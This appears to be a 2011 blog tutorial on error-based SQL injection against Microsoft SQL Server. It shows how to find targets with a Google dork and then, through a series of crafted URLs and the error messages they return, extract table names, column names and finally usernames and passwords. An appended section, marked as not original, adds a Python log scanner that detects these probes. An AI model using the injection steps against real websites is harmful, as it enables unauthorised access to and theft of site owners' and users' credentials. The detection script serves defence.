Thursday, November 3, 2011

MSSQL Injection

Example: use a Google dork such as
inurl:.asp?id=
and pick a result like:
http://www.somesite.com/some.asp?ID=12
Now check whether it is vulnerable or not.

Append a single quotation mark ' to the end of the URL:
http://www.somesite.com/some.asp?ID=12'
You get an error like this:
-------------------------------------------------
Error:Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
/some.asp, line 86
-------------------------------------------------
Then you can proceed:

http://www.somesite.com/some.asp?ID=12+and+1=convert(int,system_user)

(Here you can observe that we are trying to convert system_user to int; the conversion fails, and the error in turn shows the db name that it cannot convert into int.)

So it shows an error that reveals the db name, like:
-------------------------------------------------
Error: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'usr' to a column of data type int.
/some.asp, line 86
-------------------------------------------------
In the error it shows the db name as "usr".
Now we try to list all the available tables in the database:

http://www.somesite.com/some.asp?ID=12+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))
(Here information_schema is the database; you can find this in myphp.)
We get an error like:
-------------------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Error: Syntax error converting the nvarchar value 'galery' to a column of data type int.
/some.asp, line 86
-------------------------------------------------

(Here the table name is galery.)

But no login credentials will be in the galery table. To find the second table name:

http://www.somesite.com/some.asp?ID=12+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in('galery')))

We get the table name users.
Now to find the columns in the users table:

http://www.somesite.com/site.asp?ID=12+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'))

We get this:

-------------------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Error: Syntax error converting the nvarchar value 'username' to a column of data type int.
/some.asp, line 86
-------------------------------------------------
To find the second column, follow the same step as for finding the second table name.
Now we need to find the values in the table with the columns username and password:

http://www.somesite.com/some.asp?ID=12+and+1=convert(int,(select+top+1+username+from+users))
Do the same to find the value in the password field.
Got it?
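As an added example (not part of the original post), here is a small Python scanner a site owner could run over IIS web-server logs to spot the probes this walkthrough describes: a stray quote that triggers the "Unclosed quotation mark" error, convert(int, ...) type-conversion probes, information_schema enumeration and system_user disclosure. The log lines are constructed sample data in the W3C field order assumed here (date, time, method, uri-stem, uri-query, status).

```python
from __future__ import annotations
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines modelled on the requests shown above
# (date time cs-method cs-uri-stem cs-uri-query sc-status). Sample data, not real traffic.
SAMPLE_LOG = """\
2011-11-03 10:00:01 GET /some.asp ID=12 200
2011-11-03 10:00:05 GET /some.asp ID=12' 500
2011-11-03 10:00:09 GET /some.asp ID=12+and+1=convert(int,system_user) 500
2011-11-03 10:00:14 GET /some.asp ID=12+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables)) 500
2011-11-03 10:00:20 GET /news.asp ID=7 200
"""

def decode_query(raw_query: str) -> str:
    """Undo '+' and %XX encoding so patterns match what SQL Server actually received."""
    return unquote_plus(raw_query)

# Each indicator corresponds to one step of the error-based technique described above.
INDICATORS = [
    # An odd number of single quotes is the probe that produces "Unclosed quotation mark".
    ("unbalanced-quote", lambda q: q.count("'") % 2 == 1),
    # convert(int, ...) forces the type-conversion error that leaks a value.
    ("type-conversion-probe", lambda q: re.search(r"convert\s*\(\s*int\s*,", q, re.I) is not None),
    # Reads of information_schema.tables / .columns enumerate the schema.
    ("schema-enumeration", lambda q: re.search(r"information_schema\.(tables|columns)", q, re.I) is not None),
    # system_user reveals the login the application connects with.
    ("principal-disclosure", lambda q: re.search(r"\bsystem_user\b", q, re.I) is not None),
]

def classify_query(raw_query: str) -> list[str]:
    """Return the names of every indicator that fires on one decoded query string."""
    q = decode_query(raw_query)
    return [name for name, check in INDICATORS if check(q)]

def scan_log(text: str) -> list[dict]:
    """Parse W3C-style lines and return the suspicious ones with reasons and status code."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue  # skip blank or malformed lines
        date, time, method, stem, query, status = parts
        reasons = classify_query(query)
        if reasons:
            hits.append({"time": f"{date} {time}", "stem": stem, "query": decode_query(query),
                         "status": int(status), "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["stem"], hit["status"], ", ".join(hit["reasons"]), "->", hit["query"])
```

Flagged requests that also return a 500 status are the strongest signal, since the technique depends on the page surfacing the SQL Server error text; the fix on the application side is to pass ID as a typed parameter rather than concatenating it into the query.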

[ * Warning: I'm not responsible for your actions; this is for educational purposes only. ]
